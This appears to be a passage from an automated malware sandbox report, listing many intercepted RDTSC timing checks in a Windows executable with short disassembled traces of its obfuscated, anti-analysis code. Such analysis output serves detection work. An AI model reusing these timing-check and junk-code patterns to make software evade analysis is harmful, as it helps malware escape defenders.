                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10476A1 second address: 10476BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92472h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046827 second address: 104682B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104878E second address: 1048792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048792 second address: 1048798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048798 second address: 10487E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2BBEh], ebx 0x00000012 push 00000000h 0x00000014 mov ebx, dword ptr [ebp+122D1B3Dh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8114B92468h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 sub di, 74F6h 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f jc 00007F8114B92466h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049678 second address: 10496C4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8114E11BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c adc bx, 5891h 0x00000011 push 00000000h 0x00000013 xor di, B100h 0x00000018 push 00000000h 0x0000001a call 00007F8114E11BEBh 0x0000001f push edi 0x00000020 xor bl, 00000071h 0x00000023 pop ebx 0x00000024 pop edi 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007F8114E11BEDh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8114E11BF0h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10488C7 second address: 10488D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8114B92466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10496C4 second address: 10496C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048983 second address: 1048988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048988 second address: 104898D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104AA62 second address: 104AA6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C910 second address: 104C915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C915 second address: 104C929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8114B92466h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C929 second address: 104C92F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C92F second address: 104C97F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114B9246Ch 0x00000008 jbe 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F8114B92468h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D3417h], edx 0x00000031 push ecx 0x00000032 mov dword ptr [ebp+122D2BC9h], edi 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b or ebx, 6A189E00h 0x00000041 push 00000000h 0x00000043 adc di, C4CBh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C97F second address: 104C985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D862 second address: 104D90B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F8114B9246Eh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F8114B92468h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov bl, 88h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F8114B92468h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b jmp 00007F8114B92479h 0x00000050 stc 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 js 00007F8114B9247Ch 0x0000005a jmp 00007F8114B92476h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104D90B second address: 104D911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104E983 second address: 104E988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DA80 second address: 104DA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DA86 second address: 104DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F8114B92468h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push esi 0x0000002d jbe 00007F8114B9246Ah 0x00000033 mov di, D401h 0x00000037 pop ebx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jnp 00007F8114B92476h 0x00000045 jmp 00007F8114B92470h 0x0000004a mov eax, dword ptr [ebp+122D1365h] 0x00000050 push 00000000h 0x00000052 push ebp 0x00000053 call 00007F8114B92468h 0x00000058 pop ebp 0x00000059 mov dword ptr [esp+04h], ebp 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc ebp 0x00000066 push ebp 0x00000067 ret 0x00000068 pop ebp 0x00000069 ret 0x0000006a mov ebx, edx 0x0000006c push FFFFFFFFh 0x0000006e jp 00007F8114B92468h 0x00000074 mov ebx, eax 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB17 second address: 104DB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8114E11BE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB22 second address: 104DB4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8114B92472h 0x00000008 jmp 00007F8114B9246Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F8114B9246Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104DB4F second address: 104DB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F973 second address: 104FA19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F8114B92468h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, si 0x0000002b xor di, D964h 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jns 00007F8114B92482h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov ebx, dword ptr [ebp+122D388Eh] 0x0000004a mov eax, dword ptr [ebp+122D1771h] 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F8114B92468h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 00000019h 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c movsx ebx, cx 0x0000006f sub dword ptr [ebp+122D1A9Fh], edx 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FA19 second address: 104FA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF6h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8114E11BEBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A75 second address: 1052A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A7B second address: 1052A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10547E4 second address: 10547FE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8114B9246Ch 0x00000008 jc 00007F8114B92466h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 je 00007F8114B92470h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052A7F second address: 1052B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, 159174CFh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 xor edi, dword ptr [ebp+12474BF2h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ebx, dword ptr [ebp+122D5936h] 0x0000002a mov eax, dword ptr [ebp+122D0715h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F8114E11BE8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D2CC0h], ebx 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push edi 0x00000055 call 00007F8114E11BE8h 0x0000005a pop edi 0x0000005b mov dword ptr [esp+04h], edi 0x0000005f add dword ptr [esp+04h], 00000014h 0x00000067 inc edi 0x00000068 push edi 0x00000069 ret 0x0000006a pop edi 0x0000006b ret 0x0000006c mov ebx, edx 0x0000006e nop 0x0000006f jmp 00007F8114E11BEBh 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052B03 second address: 1052B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052B09 second address: 1052B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10570CA second address: 10570CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10570CE second address: 10570E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8114E11BEBh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F987 second address: 105F9AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92476h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8114B9246Ch 0x00000011 js 00007F8114B92466h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9AF second address: 105F9B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9B8 second address: 105F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F8114B92466h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jg 00007F8114B92466h 0x00000017 jmp 00007F8114B9246Ah 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9E2 second address: 105F9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9E6 second address: 105F9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9F0 second address: 105F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F9F6 second address: 105F9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064D97 second address: 1064D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064D9E second address: 1064DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8114B92466h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674AF second address: 10674B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674B3 second address: 10674B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10674B9 second address: 10674F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8114E11BECh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F8114E11BEDh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8114E11BEBh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10675FC second address: 1067617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114B92476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A20 second address: 1068A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068A25 second address: 1068A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92478h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC55 second address: 106DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DC5B second address: 106DC90 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8114B92466h 0x00000008 jmp 00007F8114B92471h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F8114B92477h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE86 second address: FFCE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE8A second address: FFCE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCE8E second address: FFCEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C94E second address: 106C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8114B9246Bh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C964 second address: 106C96B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C96B second address: 106C971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C971 second address: 106C977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D08E second address: 106D096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D1F0 second address: 106D203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F8114E11BEAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D203 second address: 106D207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D32D second address: 106D35C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8114E11BF9h 0x00000012 popad 0x00000013 js 00007F8114E11BECh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DAB8 second address: 106DAF6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8114B92479h 0x00000011 jmp 00007F8114B92479h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070FD6 second address: 1070FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070FE1 second address: 1071002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8114B92466h 0x00000009 jmp 00007F8114B92476h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071002 second address: 107100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076944 second address: 107694A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107694A second address: 107694E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107540C second address: 107541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8114B92466h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107541B second address: 1075421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075589 second address: 107558D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107558D second address: 10755A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8114E11BE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F8114E11BE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075892 second address: 10758A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F8114B9246Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075B3E second address: 1075B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075B42 second address: 1075B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8114B92471h 0x0000000e jmp 00007F8114B92479h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075F9D second address: 1075FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF5h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F8114E11BEDh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F8114E11BEFh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075FDC second address: 1075FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271D8 second address: 10271DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271DE second address: 10271FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8114B92478h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10271FC second address: 1027210 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8114E11BEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
